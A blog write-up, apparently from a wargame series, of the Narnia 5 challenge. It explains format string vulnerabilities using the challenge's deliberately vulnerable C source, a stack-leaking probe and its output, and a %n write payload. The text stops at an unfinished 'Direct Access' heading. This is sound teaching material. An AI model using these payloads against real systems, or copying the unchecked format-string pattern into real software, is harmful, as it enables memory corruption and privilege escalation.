{"id":595,"date":"2023-06-01T14:12:13","date_gmt":"2023-06-01T12:12:13","guid":{"rendered":"https:\/\/mindshield.eu\/?p=595"},"modified":"2023-09-06T11:39:47","modified_gmt":"2023-09-06T09:39:47","slug":"narnia5","status":"publish","type":"post","link":"https:\/\/mindshield.eu\/index.php\/2023\/06\/01\/narnia5\/","title":{"rendered":"\ud83e\udd81Narnia 5"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"595\" class=\"elementor elementor-595\" data-elementor-post-type=\"post\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-cd7d664 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"cd7d664\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-fd4f6ba\" data-id=\"fd4f6ba\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3527839 elementor-widget elementor-widget-text-editor\" data-id=\"3527839\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>We are back with the 6th challenge of this series!<\/p><p>This one introduces a class of vulnerability we have not yet met in the Narnia challenges: format strings!<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-d0cd700 elementor-section-boxed elementor-section-height-default 
elementor-section-height-default\" data-id=\"d0cd700\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7b4f20a\" data-id=\"7b4f20a\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-e0b4d4e elementor-widget elementor-widget-heading\" data-id=\"e0b4d4e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Discovery<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-6994f05 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"6994f05\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-a9346a1\" data-id=\"a9346a1\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7f72abe elementor-widget elementor-widget-code-highlight\" data-id=\"7f72abe\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-c 
line-numbers\">\n\t\t\t\t<code readonly=\"true\" class=\"language-c\">\n\t\t\t\t\t<xmp>#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n#include &lt;string.h&gt;\r\n#include &lt;unistd.h&gt;\r\n\r\nint main(int argc, char **argv){\r\n        int i = 1;\r\n        char buffer[64];\r\n\r\n        \/* argv[1] is used directly as the format string *\/\r\n        snprintf(buffer, sizeof buffer, argv[1]);\r\n        buffer[sizeof (buffer) - 1] = 0;\r\n        printf(\"Change i's value from 1 -&gt; 500. \");\r\n\r\n        if(i==500){\r\n                printf(\"GOOD\\n\");\r\n                setreuid(geteuid(),geteuid());\r\n                system(\"\/bin\/sh\");\r\n        }\r\n\r\n        printf(\"No way...let me give you a hint!\\n\");\r\n        printf(\"buffer : [%s] (%d)\\n\", buffer, strlen(buffer));\r\n        printf (\"i = %d (%p)\\n\", i, &amp;i);\r\n        return 0;\r\n}<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-a00378d elementor-widget elementor-widget-text-editor\" data-id=\"a00378d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>The goal of this challenge is to obtain <code>i = 500<\/code>.<\/p><p>Thanks to the program output, we know the memory address of i and the contents of the buffer (as well as its length).<\/p><p>Here the vulnerability lies in the call to <code>snprintf<\/code>.<\/p><p>It is regarded as an unsafe function because it does not check the size of the destination buffer.\u00a0<\/p><p>Moreover, it lets an attacker read or modify values on the stack through a format string injection.<\/p><p>This is exploited by sending format strings such as &#8220;%x&#8221;.<\/p><p>As a reminder, the format family of functions includes:\u00a0<\/p><p>&#8211; snprintf<\/p><p>&#8211;\u00a0<span style=\"font-family: Roboto, sans-serif;font-size: 18px;color: var( --e-global-color-text );font-weight: var( --e-global-typography-text-font-weight )\">sprintf<\/span><\/p><p>&#8211; printf<\/p><p>&#8211; fprintf<\/p><p>&#8211; vfprintf<\/p><p>&#8211; etc.<\/p><p>These functions take parameters that specify a format (the <i>format specifiers, or format string<\/i>). Here are a few examples:\u00a0<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-db308f8 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"db308f8\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-469703c\" data-id=\"469703c\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-2ff9e4b elementor-widget elementor-widget-image\" data-id=\"2ff9e4b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img fetchpriority=\"high\" decoding=\"async\" width=\"241\" height=\"241\" src=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/format_string.drawio.png\" class=\"attachment-large size-large wp-image-605\" alt=\"\" srcset=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/format_string.drawio.png 241w, https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/format_string.drawio-150x150.png 150w\" sizes=\"(max-width: 241px) 100vw, 241px\" 
\/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-d1643ab elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"d1643ab\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-597db3c\" data-id=\"597db3c\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4f7b16b elementor-widget elementor-widget-heading\" data-id=\"4f7b16b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Exploitation<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-02df3c6 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"02df3c6\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-1f1d517\" data-id=\"1f1d517\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-33ab65e elementor-widget elementor-widget-text-editor\" data-id=\"33ab65e\" 
data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>The snprintf function works as follows:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-97993bd elementor-widget elementor-widget-code-highlight\" data-id=\"97993bd\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash line-numbers\">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>snprintf(destination, destination_size, format, arguments...)\n# Example\nsnprintf(buffer, 256, \"Coucou%x\", val)<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-9bf8c9e elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"9bf8c9e\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-0a2cf7b\" data-id=\"0a2cf7b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-93e4e3e elementor-widget elementor-widget-text-editor\" data-id=\"93e4e3e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>In this example, the string &#8220;Coucou&#8221; is copied into the buffer.<\/p><p>In addition, the value of val is written in hexadecimal.<\/p><p>But if we do not supply a variable to read, snprintf still reads a value: one taken from the stack.<\/p><p><span style=\"font-size: 18px;color: var( --e-global-color-text );font-family: var( --e-global-typography-text-font-family ), Sans-serif;font-weight: var( --e-global-typography-text-font-weight )\">We can test the vulnerability by trying to display the stack:<\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-256766b elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"256766b\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2b6e053\" data-id=\"2b6e053\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-0688368 elementor-widget elementor-widget-code-highlight\" data-id=\"0688368\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>\/narnia\/narnia5 $(python2 -c 
'print(\"%08x.%08x.%08x.%08x\\n\")')<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-c564bc8 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"c564bc8\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-d27179e\" data-id=\"d27179e\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-cdd3ed3 elementor-widget elementor-widget-text-editor\" data-id=\"cdd3ed3\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Output of the command:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-956ef40 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"956ef40\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-e66d0d7\" data-id=\"e66d0d7\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4908b54 elementor-widget 
elementor-widget-code-highlight\" data-id=\"4908b54\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>Change i's value from 1 -&gt; 500. No way...let me give you a hint!\r\nbuffer : [f7fc4500.30303534.3330332e.33353330] (35)\r\ni = 1 (0xffffd520)\r\n<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-615a609 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"615a609\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-f728b3a\" data-id=\"f728b3a\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-9414bf6 elementor-widget elementor-widget-text-editor\" data-id=\"9414bf6\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Inside the buffer variable, we can see the last 4 values present on the stack!<\/p>\n<blockquote>\n<p><b>What happens here:<\/b> printf interprets every <em>format specifier<\/em>&nbsp;(%x) and reads the preceding address on the stack.<\/p>\n<\/blockquote>\n<p>We can therefore deduce that the <em>format specifiers<\/em> can be manipulated to change the value of i.<\/p>\n<p>For that, we will need the <i>format specifier %n<\/i>. It took me a while to understand how it works and what it is for.<\/p>\n<p>For a full explanation, I recommend this guide:&nbsp;<a style=\"font-size: 18px;font-family: var( --e-global-typography-text-font-family ), Sans-serif;font-weight: var( --e-global-typography-text-font-weight )\" href=\"https:\/\/cs155.stanford.edu\/papers\/formatstring-1.2.pdf\">formatstring-1.2.pdf (stanford.edu)<\/a>.<\/p>\n<p>Broadly, %n counts the number of bytes written so far and stores that count in a variable passed as a parameter.&nbsp;<\/p>\n<p>It can therefore be used to write directly onto the stack.<\/p>\n<p>Indeed, when %n is used as below, it writes the number of characters output so far into the variable val:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-0aec523 elementor-widget elementor-widget-code-highlight\" data-id=\"0aec523\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash line-numbers\">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp># %n expects a pointer to an int, so the address of val is passed\nsnprintf(buffer, 256, \"Coucou%n\", &amp;val)<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-c5a1559 elementor-section-boxed elementor-section-height-default 
elementor-section-height-default\" data-id=\"c5a1559\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-06c5723\" data-id=\"06c5723\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3cde0cf elementor-widget elementor-widget-text-editor\" data-id=\"3cde0cf\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>But in our example, there is no val parameter:\u00a0<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-3414f31 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"3414f31\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-58c9fa9\" data-id=\"58c9fa9\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-06c4501 elementor-widget elementor-widget-code-highlight\" data-id=\"06c4501\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash 
line-numbers\">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>snprintf(buffer, sizeof buffer, argv[1]);<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-3c09909 elementor-widget elementor-widget-text-editor\" data-id=\"3c09909\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><span style=\"font-size: 18px;color: var( --e-global-color-text );font-family: var( --e-global-typography-text-font-family ), Sans-serif;font-weight: var( --e-global-typography-text-font-weight )\">So if our string contains &#8220;%n&#8221;, it will write to the stack as if there were a parameter.\u00a0<\/span><\/p><p>There are notably 2 methods to combine in order to solve the challenge: the\u00a0<b>Direct Access Parameters<\/b> method and classic format string exploitation.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-e4a5882 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"e4a5882\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-a63c9ff\" data-id=\"a63c9ff\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-b8b8ae4 elementor-widget elementor-widget-heading\" data-id=\"b8b8ae4\" data-element_type=\"widget\" 
data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h3 class=\"elementor-heading-title elementor-size-large\">Classic format string exploitation<\/h3>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-013c74f elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"013c74f\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-f6d9169\" data-id=\"f6d9169\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-990d778 elementor-widget elementor-widget-text-editor\" data-id=\"990d778\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>To understand classic format string exploitation, this guide helped me a lot:\u00a0<a style=\"font-size: 18px;font-family: var( --e-global-typography-text-font-family ), Sans-serif;font-weight: var( --e-global-typography-text-font-weight )\" href=\"https:\/\/www.exploit-db.com\/docs\/english\/28476-linux-format-string-exploitation.pdf\">Format Strings Exploitation Tutorial (exploit-db.com)<\/a><\/p><p>It goes through basic exploitation examples that we can draw on for our exploit.<\/p><p>For example:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section 
elementor-top-section elementor-element elementor-element-1ef6abe elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"1ef6abe\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-99aadaf\" data-id=\"99aadaf\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-c2b5537 elementor-widget elementor-widget-code-highlight\" data-id=\"c2b5537\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>$(printf \"\\x84\\x95\\x04\\x08AAAA\")%x%x%x%x%x%x%x%x%x%n<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-737b5ed elementor-widget elementor-widget-text-editor\" data-id=\"737b5ed\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>This injection writes to the address <code>0x08049584<\/code>.<\/p><p>The last<b> %x<\/b> has been replaced by a <b>%n<\/b>, which writes the number of bytes output so far to the given address.<\/p><p>In our case, we do not need to write &#8220;<b>AAAA<\/b>&#8221; in our final injection. These A&#8217;s are only there for testing, so that they can be found on the stack.<\/p><p>We can transpose this injection into python, which gives us:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-7d6cb70 elementor-widget elementor-widget-code-highlight\" data-id=\"7d6cb70\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>$(python2 -c 'print(\"\\x84\\x95\\x04\\x08\")')%x%x%x%x%x%x%x%x%x%n<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-f008910 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"f008910\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-6f3ab9a\" data-id=\"6f3ab9a\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ece348a elementor-widget elementor-widget-text-editor\" data-id=\"ece348a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>I drew on this template to build my injection, the difference being that I used the &#8220;Direct Access Parameters&#8221; method.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-877f026 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"877f026\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c780634\" data-id=\"c780634\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-f6478b0 elementor-widget elementor-widget-heading\" data-id=\"f6478b0\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-large\">Method: Direct Access 